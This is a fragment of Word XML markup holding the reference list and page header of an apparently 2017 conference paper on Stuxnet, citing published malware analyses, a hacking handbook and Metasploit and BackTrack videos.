              </w:rPr>
              <w:t>Falliere</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, Liam O </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Murchu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, and Eric </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Chien</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA381DB" w14:textId="77777777" w:rsidR="00D224FF" w:rsidRPr="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>“W32.Stuxnet Dossier”, Symantec Security Response,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB99968" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Version 1.4, February 2011.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF22DD" w14:paraId="0FF52329" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05C397E3" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[2].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3BA68767" w14:textId="77777777" w:rsidR="00D224FF" w:rsidRPr="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Aleksandr </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Matrosov</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, Eugene </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rodionov</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, David Harley, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Juraj</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7EA54D23" w14:textId="77777777" w:rsidR="00D224FF" w:rsidRPr="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Malcho</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, “Stuxnet Under the Microscope2”, Revision 1.31, 24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268D25F0" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Sep 2010</w:t>
            </w:r>
            <w:r w:rsidR="00753988">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF22DD" w14:paraId="16A56B64" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A528D7F" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[3].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C0B246A" w14:textId="77777777" w:rsidR="00D224FF" w:rsidRPr="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">David </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Helan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, “Stuxnet: Analysis, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mythes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and Realities”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3280EA33" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ACTU SECU 27, XCMO, 2011.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF22DD" w14:paraId="546CC654" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="769"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63158C08" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[4].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CA9EB4B" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Martin Brunner, Hans </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hofinger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, Christoph </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KrauSS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DB474AA" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Christopher </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Roblee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, Peter </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Schoo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, Sascha </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Todt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, “Infiltrating</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EEC5E1E" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Critical Infrastructures with Next-Generation Attacks</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE3A639" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>W32.Stuxnet as a Showcase Threat”, Version 1.4, December</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF22DD" w14:paraId="57FF79CE" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="950"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C015463" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[5].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A0F4BEF" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Shon Harris, Allen Harper, Chris Eagle, Jonathan Ness, “Gray</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E0CDF2" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hat Hacking: The Ethical Hacker’s Handbook”, Copyright</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56496047" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2008 by McGraw-Hill Companies Second Edition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF22DD" w14:paraId="27FB20A5" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7EF0B0E5" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[6].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72BF31F5" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rahat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Masood, “Stuxnet Simulation via Metasploit.wmv”,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BEC6C15" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>http://www.youtube.com/watch?v=AZNU7bCRvJg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF22DD" w14:paraId="7F6FF590" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68202A90" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[7].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="350DC13C" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WikiPedia</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, “Stuxnet”, http://en.wikipedia.org/wiki/Stuxnet,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBAFC5A" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>October 21, 2011.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF22DD" w14:paraId="23CED3A5" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="052C92AC" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[8].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A037F9E" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phoonjzc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, “Installing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>BackTrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4 on Virtual Box with</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13438D8B" w14:textId="77777777" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WindowsHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>”,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2199C95E" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="003775F4" w:rsidP="003775F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="003775F4">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>http://www.youtube.com/watch?v=up2OR1M0aUk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="509A3922" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00AF22DD" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AF22DD">
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1215" w:right="1071" w:bottom="738" w:left="1080" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:num="2" w:space="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2907D" w14:textId="77777777" w:rsidR="00606D22" w:rsidRDefault="00606D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05DAE496" w14:textId="77777777" w:rsidR="00606D22" w:rsidRDefault="0060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0D53A" w14:textId="77777777" w:rsidR="00606D22" w:rsidRDefault="00606D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="48774500" w14:textId="77777777" w:rsidR="00606D22" w:rsidRDefault="00606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C6EA8" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
    <w:pPr>
      <w:spacing w:after="30" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-317" w:right="-226" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>2017 International Conference on Advanced Computing and Communication Systems (</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:i/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>ICACCS</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve"> -2017), Jan. 06 – 07, 2017, Coimbatore, INDIA </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="409DDCE1" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-317"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702D2" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
